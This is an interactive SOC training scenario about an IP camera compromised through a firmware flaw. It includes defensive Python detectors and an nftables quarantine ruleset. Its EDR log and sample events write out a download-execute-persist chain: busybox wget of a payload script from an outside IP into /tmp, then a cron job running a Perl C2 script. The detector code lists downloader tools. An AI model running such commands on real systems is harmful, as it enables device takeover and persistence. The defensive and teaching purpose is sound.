ÇOLHAK Corporation – Advanced IoT Crisis Simulation
In this interactive scenario, you are a member of the ÇOLHAK Corporation's cybersecurity team. Your mission is to analyze an evolving security threat, make critical decisions, and protect the company from a potential disaster. Carefully evaluate the information presented at each step. Are you ready?
As the day begins, Tier-1 SOC Analyst Ezgi notices a critical alert on the SIEM (Security Information and Event Management) dashboard. A correlation rule has been triggered: "Periodic Data Exfiltration from Critical Asset Network to Unknown C2 Server".
ALERT ID: 8451
TRIGGER: Correlation Rule - "Suspicious C2 Beaconing"
SOURCE IP: 10.10.30.15 (VLAN: IoT Devices)
HOSTNAME: KAMERA-3KAT-OKYANUS
SOURCE MAC: 00:1A:2B:3C:4D:5E
DESTINATION IP: 88.54.12.219 (Reputation: Low, Category: Unknown)
PROTOCOL: UDP/443
OBSERVATION: Roughly 128 KB of data has been sent every 5 minutes for the last 3 hours.
PCAP SUMMARY: DNS query for 'update.serve-config.net' resolved to 88.54.12.219. UDP payload contains obfuscated Base64 strings.
MITRE ATT&CK MAPPING: T1041 (Exfiltration Over C2 Channel), T1571 (Non-Standard Port)
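The correlation rule that fired on this alert keys on two properties of the flow: a nearly constant interval and a nearly constant payload size. The following is an added example of that logic, not the ÇOLHAK SIEM's own rule. The flow records it runs on are constructed to reproduce the alert's pattern (about 128 KB from 10.10.30.15 to 88.54.12.219 on UDP/443 every 5 minutes) next to an irregular browsing-style flow from a second, assumed host (10.10.30.22 to 203.0.113.40) that must not be flagged, and a short DNS series with too few events to judge.

```python
"""Periodic-beacon detection over flow records (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev


def make_sample_flows():
    """Constructed flow log: one record per observed flow."""
    base = datetime(2025, 3, 10, 5, 0, 0)
    flows = []

    # 36 beacons over 3 hours. Small timing jitter and size variation mimic a
    # real implant; the period and payload size stay almost constant.
    jitter_s = [0, 2, -1, 3, 1, -2]
    size_delta = [0, 256, -128, 64, 192, -64]
    for i in range(36):
        flows.append({
            "ts": base + timedelta(seconds=300 * i + jitter_s[i % 6]),
            "src": "10.10.30.15", "dst": "88.54.12.219",
            "proto": "udp", "dport": 443,
            "bytes": 128 * 1024 + size_delta[i % 6],
        })

    # Ordinary client traffic (assumed host): bursts at irregular intervals and sizes.
    offsets_s = [0, 40, 55, 300, 310, 900, 2000, 2100, 2105, 4000, 4010, 6000, 6100, 7000]
    sizes = [1200, 54000, 3300, 120000, 800, 9000, 2500, 70000, 1500, 33000, 600, 88000, 4100, 2200]
    for off, size in zip(offsets_s, sizes):
        flows.append({
            "ts": base + timedelta(seconds=off),
            "src": "10.10.30.22", "dst": "203.0.113.40",
            "proto": "tcp", "dport": 443, "bytes": size,
        })

    # A handful of DNS lookups: too few events to judge periodicity.
    for off in (5, 1800, 5400):
        flows.append({
            "ts": base + timedelta(seconds=off),
            "src": "10.10.30.15", "dst": "10.10.0.53",
            "proto": "udp", "dport": 53, "bytes": 90,
        })
    return flows


def detect_beacons(flows, min_events=12, max_interval_cv=0.15, max_size_cv=0.25):
    """Flag (src, dst, proto, dport) tuples whose inter-arrival times and
    payload sizes are both nearly constant.

    The coefficient of variation (stdev / mean) is scale-free, so the same
    thresholds work for a 60-second and a 5-minute beacon. min_events keeps
    short-lived flows from triggering on two or three coincidental gaps.
    """
    groups = defaultdict(list)
    for f in flows:
        groups[(f["src"], f["dst"], f["proto"], f["dport"])].append(f)

    findings = []
    for (src, dst, proto, dport), events in groups.items():
        if len(events) < min_events:
            continue
        events.sort(key=lambda e: e["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(events, events[1:])]
        sizes = [e["bytes"] for e in events]
        if mean(gaps) == 0 or mean(sizes) == 0:
            continue
        gap_cv = pstdev(gaps) / mean(gaps)
        size_cv = pstdev(sizes) / mean(sizes)
        if gap_cv <= max_interval_cv and size_cv <= max_size_cv:
            findings.append({
                "src": src, "dst": dst, "proto": proto, "dport": dport,
                "events": len(events),
                "period_s": round(mean(gaps), 1),
                "avg_bytes": round(mean(sizes)),
                "interval_cv": round(gap_cv, 3),
                "size_cv": round(size_cv, 3),
            })
    return findings


if __name__ == "__main__":
    for hit in detect_beacons(make_sample_flows()):
        print(hit)
```

Run against the constructed log, only the 10.10.30.15 to 88.54.12.219 tuple is reported, with a period of about 300 seconds and an interval CV near 0.01; the browsing flow has the same event count but an interval CV above 1, and the DNS series never reaches `min_events`. On real flow data the thresholds are the tuning knobs: implants that add deliberate jitter push `interval_cv` up, so a production rule normally pairs this test with the destination's reputation, as the alert above does.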
Ezgi: "This isn't normal traffic. The source IP appears to be on the IoT VLAN, and the destination is a suspicious address we haven't seen before. The MITRE mappings are also concerning. I'm escalating this to Tier-2 (Alper) immediately."
Almost at the same time as Ezgi's analysis, two new events arrive: a help desk ticket and an Active Directory alert. As a team, you must decide which to prioritize.
User: Ayşe Yılmaz
Subject: The camera in the 3rd Floor Ocean Meeting Room is constantly freezing and its web interface is very slow. There was no such problem yesterday morning.
System: Active Directory
Subject: Over 50 failed login attempts detected for the Chief Financial Officer (CFO) account in the last 15 minutes.
Team Lead: "We have two potentially serious incidents. One is a potential data leak, the other could be an attack on a high-level executive's account. Our resources are limited, which one do we focus on?"
The team decides to focus on the CFO's account. A quick investigation reveals that the CFO is on vacation abroad and was repeatedly trying to log in from their mobile device after forgetting their new password. The account is temporarily locked, and the situation is brought under control.
Alper: "That was a false positive. But we lost about 20 minutes investigating it. We need to get back to the other incident urgently. I hope we're not too late."
Tier-2 Analyst Alper correlates the SIEM alert with the help desk ticket. He queries the suspicious IP address `10.10.30.15` in the company's Asset Management System. The result is clear: The IP address belongs to a "SmartEye 3000" model IP camera in the 3rd Floor Ocean Meeting Room.
Alper takes his analysis a step further by checking the EDR (Endpoint Detection and Response) console and finds a critical piece of evidence:
EDR LOG - Device: KAMERA-3KAT-OKYANUS (10.10.30.15)
PROCESS: /bin/busybox
COMMAND: busybox wget http://88.54.12.219/payload.sh -O /tmp/p.sh
ACTION: 'p.sh' script executed. A crontab job was created containing the command 'perl /tmp/c2.pl'.
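The three EDR lines above are a complete download, execute and persist chain, and that sequence is what an EDR rule should key on rather than any one command. The following is an added example of such a rule, not the ÇOLHAK team's EDR logic. The events are constructed: the first host replays the chain observed on KAMERA-3KAT-OKYANUS (busybox wget into /tmp, the script run, a crontab entry pointing at /tmp); the second host, an assumed KAMERA-2KAT-GUNES, performs a benign internal firmware check that must not be flagged. The ATT&CK IDs are real; the timestamps are invented.

```python
"""Download-execute-persist chain detection over EDR process events (added example)."""
import re
import shlex
from collections import defaultdict

STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
INTERPRETERS = {"sh", "ash", "bash", "dash", "perl", "python", "python3"}
STAGED_PATH = re.compile(r"(?:/tmp|/var/tmp|/dev/shm)/[^\s\"']+")

# ATT&CK technique for each stage of the chain.
TECHNIQUES = {
    "download": "T1105",         # Ingress Tool Transfer
    "exec": "T1059.004",         # Command and Scripting Interpreter: Unix Shell
    "persistence": "T1053.003",  # Scheduled Task/Job: Cron
}

SAMPLE_EVENTS = [  # constructed for this example
    {"ts": "2025-03-10T04:58:11", "host": "KAMERA-3KAT-OKYANUS", "process": "/bin/busybox",
     "cmdline": "busybox wget http://88.54.12.219/payload.sh -O /tmp/p.sh"},
    {"ts": "2025-03-10T04:58:14", "host": "KAMERA-3KAT-OKYANUS", "process": "/bin/sh",
     "cmdline": "sh /tmp/p.sh"},
    {"ts": "2025-03-10T04:58:15", "host": "KAMERA-3KAT-OKYANUS", "process": "/bin/sh",
     "cmdline": "sh -c 'echo \"*/5 * * * * perl /tmp/c2.pl\" | crontab -'"},
    {"ts": "2025-03-10T05:00:00", "host": "KAMERA-3KAT-OKYANUS", "process": "/usr/bin/perl",
     "cmdline": "perl /tmp/c2.pl"},
    {"ts": "2025-03-10T04:59:00", "host": "KAMERA-2KAT-GUNES", "process": "/bin/busybox",
     "cmdline": "busybox wget http://10.10.5.20/fw/check.cfg -O /var/run/fwcheck.cfg"},
    {"ts": "2025-03-10T04:59:01", "host": "KAMERA-2KAT-GUNES", "process": "/bin/sh",
     "cmdline": "sh /etc/init.d/S50watchdog restart"},
]


def _argv(cmdline):
    """Tokenize a command line; fall back to whitespace splitting on bad quoting."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a hostile command line
        argv = cmdline.split()
    # busybox applets are invoked as "busybox <applet> ..."; inspect the applet.
    if argv and argv[0].rsplit("/", 1)[-1] == "busybox" and len(argv) > 1:
        argv = argv[1:]
    return argv


def classify(event):
    """Return (stage, detail) for one process event, or None if uninteresting."""
    argv = _argv(event["cmdline"])
    if not argv:
        return None
    tool = argv[0].rsplit("/", 1)[-1]

    # Stage 1: a download tool writing into a world-writable staging directory.
    if tool in DOWNLOADERS:
        url = next((a for a in argv
                    if a.startswith(("http://", "https://", "ftp://", "tftp://"))), None)
        out = None
        for i, a in enumerate(argv):
            if a in ("-O", "-o") and i + 1 < len(argv):
                out = argv[i + 1]
            elif a.startswith("--output-document="):
                out = a.split("=", 1)[1]
        if url and out and out.startswith(STAGING_DIRS):
            return "download", (url, out)
        return None

    # Stage 3: a cron entry that points at something in a staging directory.
    cmdline = event["cmdline"]
    if "crontab" in cmdline or "/etc/crontabs" in cmdline or "/var/spool/cron" in cmdline:
        m = STAGED_PATH.search(cmdline)
        return ("persistence", (m.group(0),)) if m else None

    # Stage 2: anything executed from a staging directory, directly or via an interpreter.
    if argv[0].startswith(STAGING_DIRS):
        return "exec", (argv[0],)
    if tool in INTERPRETERS:
        staged = [a for a in argv[1:] if a.startswith(STAGING_DIRS)]
        if staged:
            return "exec", (staged[0],)
    return None


def analyze(events):
    """Group events per host, classify each in time order and score the host
    by how many stages of the chain were observed."""
    per_host = defaultdict(lambda: {"download": [], "exec": [], "persistence": []})
    for ev in sorted(events, key=lambda e: e["ts"]):
        hit = classify(ev)
        if hit:
            stage, detail = hit
            per_host[ev["host"]][stage].append(detail)

    findings = {}
    for host, stages in per_host.items():
        seen = [s for s in ("download", "exec", "persistence") if stages[s]]
        if not seen:
            continue
        findings[host] = {
            "severity": {1: "medium", 2: "high", 3: "critical"}[len(seen)],
            "techniques": [TECHNIQUES[s] for s in seen],
            **{s: stages[s] for s in seen},
        }
    return findings


if __name__ == "__main__":
    for host, finding in analyze(SAMPLE_EVENTS).items():
        print(host, finding)
```

The benign host is never reported: its wget target is an internal server and the output lands outside the staging directories, and its shell invocation runs an init script. The compromised camera is scored critical because all three stages are present; on a device that has only fetched a file into /tmp the same rule yields a medium finding, which is the point at which Alper's manual correlation with the help desk ticket would start.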
A quick internet search reveals a recently disclosed critical vulnerability (CVE-2025-1337) in this model's firmware. This vulnerability allows for unauthorized Remote Code Execution (RCE).
Alper: "Okay, it all makes sense now. The slowdown in the camera isn't a malfunction; it's a symptom. The device has been compromised via a known vulnerability, downloaded a payload, and is sending data to a C2 server as part of a botnet. We need to report this to our manager, Ceyda, immediately."
Just as Alper is preparing to present his findings to Ceyda, his phone rings. It's the Sales Director, and he sounds very tense.
Sales Director: "Is your team dealing with the camera in the Ocean Room? That camera needs to be operational in less than an hour, we have a live demo for a very important international client! You can't shut down the room, find a solution immediately!"
This new information shows that the decision has an operational dimension as well as a technical one. The pressure on the team has increased.
Alper summarizes the situation for Cybersecurity Manager Ceyda: "We have an IP camera that has been compromised using the CVE-2025-1337 vulnerability. For now, it's only communicating with the outside with small data packets, which looks like 'beaconing' activity. We haven't detected any lateral movement within the network yet. However, the Sales Department needs that camera in less than an hour."
Ceyda: "Understood. Our time is limited, and we're under pressure. It seems we have three options. The decision is yours. What do we do?"
Make your decision as a team:
Option A: Immediately disconnect the camera from the network. Take the device to a lab environment, capture a forensic image of it, and update it with the latest firmware. The threat is stopped instantly.
Risk: We won't be able to learn more about who the attacker is or what their ultimate goal is. The sales presentation will be canceled.
Option B: Redirect the camera's traffic to a "Honeypot" environment that is completely isolated from the main network. Secretly monitor the attacker's behaviors (TTPs) to gather valuable intelligence.
Risk: The attacker might notice the Honeypot or launch a more aggressive attack (e.g., ransomware) during observation.
Option C: Move the camera to an isolated VLAN with no internet access. Block its egress traffic but allow it to communicate with 'bait' assets on the local network to observe its actions. This could reveal lateral movement attempts.
Risk: A configuration error could allow the attacker to escape the quarantine. The sales presentation might still be delayed.
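The quarantine in the last option is, concretely, a default-deny forwarding policy with one logged exception. The following nftables ruleset is an added example of it, not ÇOLHAK's configuration. Its names are assumptions: the camera is re-addressed into a quarantine VLAN 99 (10.10.99.0/24, firewall interface "vlan99"), and the bait assets sit in a separate VLAN 98 (10.10.98.10 and 10.10.98.11) so that every packet between the two segments crosses this firewall.

```nft
# Added example, not ÇOLHAK's configuration. Assumed layout: compromised camera
# in quarantine VLAN 99 (10.10.99.0/24, firewall interface "vlan99"); bait
# assets in VLAN 98 at 10.10.98.10 and 10.10.98.11, behind the same firewall.
# Load with: nft -f quarantine.nft

table inet quarantine
flush table inet quarantine

table inet quarantine {
    set bait_hosts {
        type ipv4_addr
        elements = { 10.10.98.10, 10.10.98.11 }
    }

    chain forward {
        # Default-deny: anything not explicitly allowed below is dropped.
        type filter hook forward priority 0; policy drop;

        # Replies for sessions the camera has opened towards the bait hosts.
        ct state established,related accept

        # The only path out of the quarantine segment: to the bait assets, logged.
        iifname "vlan99" ip saddr 10.10.99.0/24 ip daddr @bait_hosts log prefix "quarantine-bait: " accept

        # No egress to the internet, the corporate VLANs or 88.54.12.219. The
        # logged attempts are the observation data this option exists to collect.
        iifname "vlan99" log prefix "quarantine-drop: " drop

        # Nothing from any other segment may initiate a session into vlan99.
        oifname "vlan99" log prefix "quarantine-ingress-drop: " drop
    }
}
```

Check the quarantine before the camera is moved: `nft list ruleset` must show the table, and a test connection from the quarantine VLAN to any external address must appear in the kernel log with the quarantine-drop prefix rather than succeed. The ruleset says nothing about layer 2: if the bait assets shared the camera's VLAN, their traffic would never reach this forward chain and could not be logged or stopped, which is exactly the kind of configuration error the stated risk refers to.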
The team decided to implement Option A. The camera's port was immediately disabled on the switch, and the device was physically removed to the lab. The sales presentation was canceled.
Affected Systems: 1 | Financial Loss: ₺50,000 | Data Loss: 0% | Reputation Score: 95/100
The team decided to implement Option B. However, the experienced attacker noticed the Honeypot and launched an aggressive attack.
Affected Systems: 4+ | Financial Loss: ₺15,000,000+ | Data Loss: 40% | Reputation Score: 20/100
The team decided to implement Option C. The camera was moved to a special VLAN with no internet access, and all its activity was monitored.
Affected Systems: 1 | Financial Loss: ₺5,000 | Data Loss: 0% | Reputation Score: 100/100
ShadowCircuit v6 – © 2025 ÇOLHAK